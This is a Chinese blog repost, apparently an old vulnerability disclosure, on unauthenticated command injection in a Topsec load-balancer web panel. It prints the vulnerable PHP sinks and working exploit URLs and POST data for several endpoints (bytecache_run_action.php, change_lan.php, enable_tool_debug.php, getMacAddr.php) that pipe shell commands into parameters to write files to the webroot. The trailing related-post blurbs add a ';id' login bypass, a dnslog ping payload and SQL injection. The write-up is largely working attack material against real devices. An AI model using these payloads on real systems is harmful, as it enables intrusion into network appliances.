change lan.php lanid,天融信某系统前台无需登录命令执行六处

最新推荐文章于 2024-04-04 22:00:58 发布
最新推荐文章于 2024-04-04 22:00:58 发布
阅读量162 收藏
点赞数
文章标签: change lan.php lanid

bytecache_run_action.php:

require_once dirname(__FILE__)."/../common/commandWrapper.inc";

require_once dirname(__FILE__)."/../common/UciUtil.inc";

$action = $_GET['action'];

$engine = $_GET['engine'];

$ipfilter= $_GET['ipfilter'];

if($action=="1"){

$ipFilterArray = split("[/.]",$ipfilter);

for($m =0 ;$m<4 ;$m++){

if($ipFilterArray[$m]>15){

$ipFilterArray[$m]=dechex($ipFilterArray[$m]);

}else{

$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);

}

}$ipFilterNum =$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];

UciUtil::setValue('appex', 'sys', 'BCDebugEngineId',$engine);

UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter',$ipfilter);

startByteCacheDebug($engine,$ipFilterNum);

}else{

$engine = UciUtil::getValue('appex', 'sys', 'BCDebugEngineId');

stopByteCacheDebug($engine);

}?>

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

require_oncedirname(__FILE__)."/../common/commandWrapper.inc";

require_oncedirname(__FILE__)."/../common/UciUtil.inc";

$action=$_GET['action'];

$engine=$_GET['engine'];

$ipfilter=$_GET['ipfilter'];

if($action=="1"){

$ipFilterArray=split("[/.]",$ipfilter);

for($m=0;$m<4;$m++){

if($ipFilterArray[$m]>15){

$ipFilterArray[$m]=dechex($ipFilterArray[$m]);

}else{

$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);

}

}$ipFilterNum=$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];

UciUtil::setValue('appex','sys','BCDebugEngineId',$engine);

UciUtil::setValue('appex','sys','BCDebugIpFilter',$ipfilter);

startByteCacheDebug($engine,$ipFilterNum);

}else{

$engine=UciUtil::getValue('appex','sys','BCDebugEngineId');

stopByteCacheDebug($engine);

}?>

第一处:setValue跟进去:

public static function setValue($package, $config, $option, $value){

self::getUciDao()->set($package, $config, $option, $value);

}

1

2

3

publicstaticfunctionsetValue($package,$config,$option,$value){

self::getUciDao()->set($package,$config,$option,$value);

}

再跟进去:

public function setConfig($package,$config,$value){

$cmd = UCI_CMD." set ".$package.".".$config."=".$value;

exec($cmd);

}

1

2

3

4

publicfunctionsetConfig($package,$config,$value){

$cmd=UCI_CMD." set ".$package.".".$config."=".$value;

exec($cmd);

}

说明value可控第二处:startByteCacheDebug($engine,$ipFilterNum);跟进去:

function startByteCacheDebug($engine,$ipFilter){

$command = "/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";

execute($command);

}

1

2

3

4

functionstartByteCacheDebug($engine,$ipFilter){

$command="/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";

execute($command);

}

第三处:当action 不是1的时候stopByteCacheDebug($engine);跟进去:

function stopByteCacheDebug($engine){

$command = "/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";

execute($command);

//echo $command;

}

1

2

3

4

5

functionstopByteCacheDebug($engine){

$command="/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";

execute($command);

//echo $command;

}

证明一处即可:**.**.**.**:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10访问:**.**.**.**:8080/acc/debug/a.php第四处:change_lan.php

$lanID = 'En';$refLink = $_SERVER['HTTP_REFERER'];

if(empty($refLink)){

$refLink = "/index.php";

}

$refLink = str_replace("?error=1", "", $refLink);

if(array_key_exists('LanID',$_REQUEST))

{

$lanID = $_REQUEST["LanID"];

$appexSystemDao = new AppexSystemDao();

$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);

$appexSystemDao->commit();

session_start();

1

2

3

4

5

6

7

8

9

10

11

12

$lanID='En';$refLink=$_SERVER['HTTP_REFERER'];

if(empty($refLink)){

$refLink="/index.php";

}

$refLink=str_replace("?error=1","",$refLink);

if(array_key_exists('LanID',$_REQUEST))

{

$lanID=$_REQUEST["LanID"];

$appexSystemDao=newAppexSystemDao();

$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);

$appexSystemDao->commit();

session_start();

跟进setAppexSystemConfigItemValue:

public function setAppexSystemConfigItemValue($option,$value){

parent::set(UCI_APPEX,"sys",$option,$value);

}

1

2

3

publicfunctionsetAppexSystemConfigItemValue($option,$value){

parent::set(UCI_APPEX,"sys",$option,$value);

}

再跟进;

public function set($package,$config,$option,$value){

$cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";

exec($cmd);

}

1

2

3

4

publicfunctionset($package,$config,$option,$value){

$cmd=UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";

exec($cmd);

}

**.**.**.**:8080/change_lan.phppostdata:LanID=1' | echo ' wooyun' > a.php | '

bbfa6d6e33fe64442053b38118706fdb.png

第五处:enable_tool_debug.php:

require_once dirname(__FILE__)."/../common/commandWrapper.inc";

error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);

$val = $_GET['val'];

$tool = $_GET['tool'];

$par = $_GET['par'];

runTool($val,$tool,$par);

?>

1

2

3

4

5

6

7

8

require_oncedirname(__FILE__)."/../common/commandWrapper.inc";

error_reporting(E_ALL^E_WARNING^E_NOTICE);

$val=$_GET['val'];

$tool=$_GET['tool'];

$par=$_GET['par'];

runTool($val,$tool,$par);

?>

runTool:

function runTool($val,$tool,$par){

if($val=="0"){

UciUtil::setValue('system', 'runtool', 'tool', $tool);

UciUtil::setValue('system', 'runtool', 'parameter', $par);

UciUtil::commit('system');

if($tool=="1"){

exec('ping '.$par.'>/tmp/tool_result &');

}else if($tool=="2"){

exec('traceroute '.$par.'>/tmp/tool_result &');

}

}else if($val=="1"){

$tool=UciUtil::getValue('system', 'runtool', 'tool');

if($tool=="1"){

exec('killall ping ');

}else if($tool=="2"){

exec('killall traceroute ');

}

UciUtil::setValue('system', 'runtool', 'tool', '');

UciUtil::setValue('system', 'runtool', 'parameter', '');

UciUtil::commit('system');

exec('echo "">/tmp/tool_result');

}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

functionrunTool($val,$tool,$par){

if($val=="0"){

UciUtil::setValue('system','runtool','tool',$tool);

UciUtil::setValue('system','runtool','parameter',$par);

UciUtil::commit('system');

if($tool=="1"){

exec('ping '.$par.'>/tmp/tool_result &');

}elseif($tool=="2"){

exec('traceroute '.$par.'>/tmp/tool_result &');

}

}elseif($val=="1"){

$tool=UciUtil::getValue('system','runtool','tool');

if($tool=="1"){

exec('killall ping ');

}elseif($tool=="2"){

exec('killall traceroute ');

}

UciUtil::setValue('system','runtool','tool','');

UciUtil::setValue('system','runtool','parameter','');

UciUtil::commit('system');

exec('echo "">/tmp/tool_result');

}

**.**.**.**:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=**.**.**.**' | echo wooyun > a.php | '

b2c79ba6a5547ee1260dfa58fa44ec4e.png

getMacAddr.php:

include_once dirname(__FILE__).'/../common/commandWrapper.inc';

$tmpeth = $_GET['eth'];

$tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth));

echo '       ';

?>

1

2

3

4

5

6

include_oncedirname(__FILE__).'/../common/commandWrapper.inc';

$tmpeth=$_GET['eth'];

$tmpmacAddr=strtoupper(getMacAddrFromIfName($tmpeth));

echo'       ';

?>

跟进getMacAddrFromIfName

function getMacAddrFromIfName($ifName){

$mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output');

if($mac != null && $mac != '')

return $mac[0];

else

return '';}

1

2

3

4

5

6

functiongetMacAddrFromIfName($ifName){

$mac=execute('cat /sys/class/net/'.trim($ifName).'/address')->get('output');

if($mac!=null&&$mac!='')

return$mac[0];

else

return'';}

**.**.**.**:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |访问**.**.**.**:8080/acc/network/c.php 即可**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080**.**.**.**:8080

触乐
关注
【漏洞复现】天融信TOPSEC-Cookie-远程命令执行
知黑而守白
01-04 183
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
天融信基线管理系统用户手册.pdf
05-07
3. 使用系统:这一部分具体指导用户如何登录系统和使用系统中的各功能点,包括首页的全网安全级别显示、不合规检查范围的热点和设备分类不合规情况的占比展示。 4. 设备中心:涉及到设备中心主页的介绍,包括设备域...
change lan.php lanid,天融信负载均衡本地文件包含漏洞
weixin_29094775的博客
03-18 225
本地文件包含:漏洞说明:出入的地方:在change_lan.php传入会话变量。error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);include_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";require_once dirname(__FILE__)."/acc/commo...
天融信TopSec的使用-1-主机评估篇
轻舟已过万重山
04-04 2426
天融信脆弱性扫描与管理系统是一款专业的网络安全工具,旨在帮助企业全面检测网络环境中的安全漏洞,并提供相应的修复建议和管理策略。该系统综合运用了多种扫描手段和技术,包括智能主机服务发现、预探测、多线程扫描等,能够快速准确地发现网络中的存活主机和存在的漏洞弱点。
天融信TOPSEC Cookie 远程命令执行漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1153
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
天融信防火墙命令.pdf
10-28
天融信防火墙命令.pdf
天融信防火墙配置手册.zip
07-14
目录 ACM NGTOS WAF 防毒墙 防火墙 负载均衡 静态隧道 漏扫 入侵防御 网闸
IS-IS
商务合作|种草文章|产品测评
05-08 3336
近几年来吗,随着网络在ISP中广泛应用,IS(Intermediate System,中间系统)-IS路由协议已经变得很普及。IS-IS最初是由DECnet公司开发的, 作为链路状态路由协议,IS-IS 基于ISO CLNS,设计之初是为了实现ISO CLNP路由,在后来加上了对IP路由的支持,具有良好的灵活性、可扩展性和稳定性。从选择来说,IS-IS更适合运营商级的网络,而OSPF非常适合企业级网络。本章介绍了IS-IS 特征、数据包格式和路由器类型等内容。
天融信TopApp-LB 负载均衡系统
weixin_44508748的博客
11-21 2259
fofa:"TopApp-LB" 1.任意用户登录 ①用户名随意 密码:;id天融信负载均衡TopApp-LB系统无需密码直接登录) ②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意 登录成功 2.sql注入漏洞 注入点vid t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=
spring boot druid 多数据源异常
weixin_34189116的博客
07-03 731
2019独角兽企业重金招聘Python工程师标准>>> ...
天融信TopApp-LB 负载均衡系统漏洞总结
Adminxe的博客
09-23 1321
0x00 漏洞描述 1、天融信负载均衡TopApp-LB系统无需密码直接登陆 2、天融信TopApp-LB负载均衡命令执行漏洞 3、天融信TopApp-LB 负载均衡系统Sql注入漏洞 0x01 漏洞复现 1、使用poc::用户名随意 密码:;id 2、使用poc:; ping xxx.dnslog.info; echo 3.1、抓包 3.2、vid参数加单引号,报错 3.3、使用or 1=1 or 1=2发现返回界面不一样,证明存在注入点(布尔盲注) ...
天融信网闸web界面登录方式_一个简易的Web注册登录界面
weixin_39785400的博客
12-01 2416
访问:http://songothao.gitee.io/web_sign_in下载:叁贰壹/WEB注册登录界面预览:运用 HTML+CSS+JS(JQuery)JS代码如下:$这里主要是使用了DOM,关于一些前端输入过滤的安全机制没有做。CSDN:https://blog.csdn.net/weixin_43148062 简书:https://www.jianshu.com/u/45339cbb...
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
最新发布
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值